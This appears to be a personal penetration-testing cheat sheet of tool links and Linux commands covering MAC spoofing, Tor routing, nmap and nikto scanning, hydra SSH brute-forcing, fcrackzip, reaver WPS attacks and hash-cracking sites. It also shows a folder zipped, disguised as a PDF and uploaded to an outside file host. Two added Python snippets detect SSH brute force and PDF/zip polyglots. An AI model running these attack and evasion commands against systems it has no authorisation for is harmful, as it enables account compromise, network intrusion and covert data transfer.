Pentest

trainings, tutors, interesting links

security cheat sheet open source software

Tools

  • http://www.mh-sec.de/downloads.html.en
  • Burp Suite
    • JSON Beautifier
    • Param miner
    • HTTP Request Smuggler
    • Backslash Powered Scanner
    • Reflected Parameters
    • Software Vulnerability Scanner
    • Java Deserialization Scanner
    • .Net Beautifier
    • Copy As Python-Request
    • Collaborator Everywhere
    • Custom Parameter Handler
    • Authmatrix
    • GraphQL Raider
    • Piper
    • JSON Web Token Attacker
    • InQl - Introspection GraphQL Scanner
  • TODO: shodan

OS

Phone OS

Linux OS for phone

Linux OS for phone tools

Messengers

Free hosting

  1. 000WebHost
  2. InfinityFree
  3. AwardSpace
  4. GitHub Pages
  5. Netlify
  6. Wix
  7. WordPress
  8. SquareSpace

connection

change mac address

# list of devices
iw dev

# sudo apt-get install macchanger
macchanger -s wlp1s0
sudo ifconfig wlp1s0 down
# ip link set wlp1s0 down
sudo macchanger -r wlp1s0
sudo ifconfig wlp1s0 up
macchanger -s wlp1s0

list all reachable wifi access points

# force a rescan
nmcli device wifi rescan
# all access points
nmcli device wifi
# all fields
nmcli -f ALL device wifi
# all fields, terse / multiline output for use in scripts
nmcli -t -f ALL device wifi
nmcli -m multiline -f ALL device wifi

# alternative way
iwlist wlan0 scan

# alternative way
iw wlan0 scan

# alternative way (interactive monitor)
sudo apt install wavemon

connect to selected network

# install tool
apt-get install wireless-tools wpasupplicant
# save password
wpa_passphrase YourSSID >> /etc/wpa_supplicant.conf

# check adapter
iwconfig
# connect to network
wpa_supplicant -D wext -i wlan0 -B -c /etc/wpa_supplicant.conf

# sudo systemctl restart wpa_supplicant

check your current IP address

  • check ip address via proxy (privoxy listening on 8118)
curl --proxy localhost:8118 'https://api.ipify.org'
curl --silent -X GET https://getfoxyproxy.org/geoip/ | grep -A 2 "Your IP Address and Location" | awk -F "strong" '{print $2 $4}' | tr '><' ' '
  • check ip address directly
curl 'https://api.ipify.org'
curl 'https://api.ipify.org?format=json'

activate tor connection

  • installation
sudo apt install tor
sudo apt install privoxy
  • configuration: sudo vim /etc/privoxy/config, add a forward rule pointing at the local tor SOCKS port (the last matching rule wins)
forward-socks5t / 127.0.0.1:9050 .
forward-socks4a / 127.0.0.1:9050 .
  • applying
# tor
sudo service tor restart
# /etc/init.d/privoxy start
sudo service privoxy restart
  • check your ip afterwards
# via TOR 
curl --proxy localhost:8118 'https://api.ipify.org'
# direct connect
curl 'https://api.ipify.org'
  • stop tor and privoxy
systemctl stop tor
systemctl status tor

systemctl stop privoxy
systemctl status privoxy

proxy

proxy list tools

https://github.com/cherkavi/python-utilitites/blob/master/proxy/foxyproxy-generator.py
https://addons.mozilla.org/de/firefox/addon/foxyproxy-standard/

Remote host analyzing

whois (cli)

# apt install whois
whois google.com

scan ports

nmap -sV -p 1-65535 {hostname}

web scan

nikto -h {host name}

CMS (content management system) detector

https://www.web4future.com/free/cms-detector.htm
https://whatcms.org
https://builtwith.com

detect possible endpoints

2ip.ru/cms (find cms)

/robots.txt
/admin.php
/admin
/admin/admin.php
/manager
/administrator
/login

Request information

Remote host connection

Hydra

# installation
apt install hydra
# usage: hydra -l <username> -p <password> <server> <service> -o <log output file> -s <custom service port> 
# usage: hydra -L <username file> -P <password file> <server> <service>
# usage: hydra -l <username> -p <password> -M <server list> <service> -o <log output file> -s <custom service port> 
# usage: hydra -C <file with login:password colon delimiter> -M <server list> <service> -o <log output file> -s <custom service port> 

hydra -l admin -p admin_pass 10.10.10.10 ssh
hydra -L logins.txt -P passwords.txt 10.10.10.10 ssh -o output.log
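Defender-side counterpart to the hydra runs above, added here as an example (not part of the original cheat sheet): it parses sshd "Failed password" lines from a constructed auth.log sample and flags a source IP once it reaches a threshold of failures inside a short window, telling a single-account run (-l/-p) from a user-list run (-L/-P). Hostname, addresses, usernames and thresholds are all made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in syslog format; none of these values come from the page.
SAMPLE_AUTH_LOG = """\
Mar  3 10:00:01 bastion sshd[2101]: Failed password for admin from 10.10.10.20 port 51000 ssh2
Mar  3 10:00:01 bastion sshd[2102]: Failed password for admin from 10.10.10.20 port 51001 ssh2
Mar  3 10:00:02 bastion sshd[2103]: Failed password for invalid user test from 10.10.10.20 port 51002 ssh2
Mar  3 10:00:02 bastion sshd[2104]: Failed password for root from 10.10.10.20 port 51003 ssh2
Mar  3 10:00:03 bastion sshd[2105]: Failed password for invalid user guest from 10.10.10.20 port 51004 ssh2
Mar  3 10:00:03 bastion sshd[2106]: Accepted publickey for deploy from 10.10.10.30 port 40000 ssh2
Mar  3 10:05:10 bastion sshd[2107]: Failed password for alice from 10.10.10.40 port 40100 ssh2
Mar  3 10:05:12 bastion sshd[2108]: Accepted password for alice from 10.10.10.40 port 40100 ssh2
"""

# "invalid user " is present when the account does not exist on the host
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect_ssh_bruteforce(log_text, threshold=5, window_s=60):
    """Group failed logins by source IP and flag any IP with `threshold` failures
    inside `window_s` seconds. Returns {ip: {"attempts", "users", "pattern"}} where
    pattern is 'single-user' (one account hammered) or 'user-list' (many accounts)."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; a fixed default year is fine for deltas
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        events[m["ip"]].append((ts, m["user"]))
    findings = {}
    for ip, evs in events.items():
        evs.sort()
        for i in range(len(evs) - threshold + 1):
            if (evs[i + threshold - 1][0] - evs[i][0]).total_seconds() <= window_s:
                users = sorted({u for _, u in evs})
                findings[ip] = {"attempts": len(evs), "users": users,
                                "pattern": "user-list" if len(users) > 1 else "single-user"}
                break
    return findings

if __name__ == "__main__":
    for ip, info in detect_ssh_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```

One legitimate failure followed by a success (alice) stays below the threshold and is not reported.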

GSM

phone info

HLR request

sms

sms receive

e-mail

just create a login & password

to change the address manually: Cookies -> https://temp-mail.org -> email

after one day the email address can no longer be recovered

files

zip -r archive.zip folder/to/compress
mv archive.zip archive.pdf
vim archive.pdf # prepend the PDF header line "%PDF-1.5"
curl -i -F name=some-archive.pdf -F file=@archive.pdf https://uguu.se/api.php?d=upload | grep "uguu.se"
wget https://a.uguu.se/1JQuulht48T6_1571004483891-2.pdf
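An added check (not part of the original page) that an upload handler can run to catch the archive-as-PDF trick above: it builds a small zip in memory, produces the renamed and "%PDF-1.5"-prefixed variants described, and classifies each by the PDF magic and ZIP signatures instead of trusting the extension. It also shows that the prefixed file is still a perfectly extractable archive, which is why content inspection rather than the header line alone is needed.

```python
import io
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"   # first zip entry, offset 0 in an untouched archive
ZIP_EOCD = b"PK\x05\x06"           # end-of-central-directory record, always near the end
PDF_MAGIC = b"%PDF-"

def classify_pdf_upload(data: bytes) -> str:
    """Classify bytes that arrived under a .pdf name by content:
    'zip-renamed'      - zip local header at offset 0 (mv archive.zip archive.pdf)
    'pdf-zip-polyglot' - PDF magic at offset 0 but a zip EOCD record in the tail
    'pdf'              - PDF magic and no zip trailer
    'unknown'          - neither signature at offset 0"""
    if data.startswith(ZIP_LOCAL_HEADER):
        return "zip-renamed"
    if data.startswith(PDF_MAGIC):
        # the EOCD record sits at most 22 bytes + a 65535-byte comment from the end
        if ZIP_EOCD in data[-(22 + 65535):]:
            return "pdf-zip-polyglot"
        return "pdf"
    return "unknown"

def still_extractable(data: bytes) -> bool:
    """True if zip tooling still opens the blob; prepended bytes do not break a zip."""
    try:
        return len(zipfile.ZipFile(io.BytesIO(data)).namelist()) > 0
    except zipfile.BadZipFile:
        return False

def build_samples() -> dict:
    """Constructed inputs: a renamed zip, the same zip with a PDF header line, a tiny real PDF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("folder/to/compress/notes.txt", "constructed sample content\n")
    archive = buf.getvalue()
    minimal_pdf = b"%PDF-1.5\n1 0 obj<</Type/Catalog>>endobj\ntrailer<</Root 1 0 R>>\n%%EOF\n"
    return {
        "archive.pdf (renamed)": archive,
        "archive.pdf (%PDF-1.5 prepended)": b"%PDF-1.5\n" + archive,
        "real.pdf": minimal_pdf,
    }

def scan_samples() -> dict:
    return {name: classify_pdf_upload(data) for name, data in build_samples().items()}

if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        print(f"{name:36} -> {verdict}")
```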

archive

open a password-protected zip by brute force

# sudo apt install fcrackzip
fcrackzip --brute-force --length 1-20 --use-unzip 1.zip
fcrackzip -v -u -b 1.zip

# rough statistic: 8 chars - 62 days

wifi

initiate monitor mode on interface

ifconfig
# (result: wlan0)
airmon-ng check kill
airmon-ng check
# (should be empty)
airmon-ng start wlan0
# (result: wlan0mon)
airodump-ng wlan0mon
# (result: BSSID)
reaver -i wlan0mon -b <BSSID> -vv -K 1

md5sum, hash

https://hashkiller.co.uk/Cracker/MD5
https://md5decrypt.net
https://www.md5.ovh/index.php?controller=Api
https://crackstation.net/

android

android market

reverse engineering

apk to jar

apk to jar download

unzip -o ~/Downloads/dex2jar-2.1.zip -d ~/Downloads/

apk to jar use

APK_NAME=my_app
PATH_TO_APK="${APK_NAME}.apk"
PATH_TO_DEX2JAR=~/Downloads/dex-tools-2.1/d2j-dex2jar.sh

sh $PATH_TO_DEX2JAR -f $PATH_TO_APK
# result
ls -la "${APK_NAME}-dex2jar.jar"

jar to java

jar to java download

jar to java tool jar to java tool download

jar to java usage

java -jar jd-gui-1.6.6-min.jar

bitcoin

electrum wallet

sudo apt install python3-pip python3-setuptools python3-pyqt5 libsecp256k1-dev
ELECTRUM_VERSION=4.3.2 # https://download.electrum.org/
pip3 install https://download.electrum.org/${ELECTRUM_VERSION}/Electrum-${ELECTRUM_VERSION}.tar.gz#egg=electrum[fast]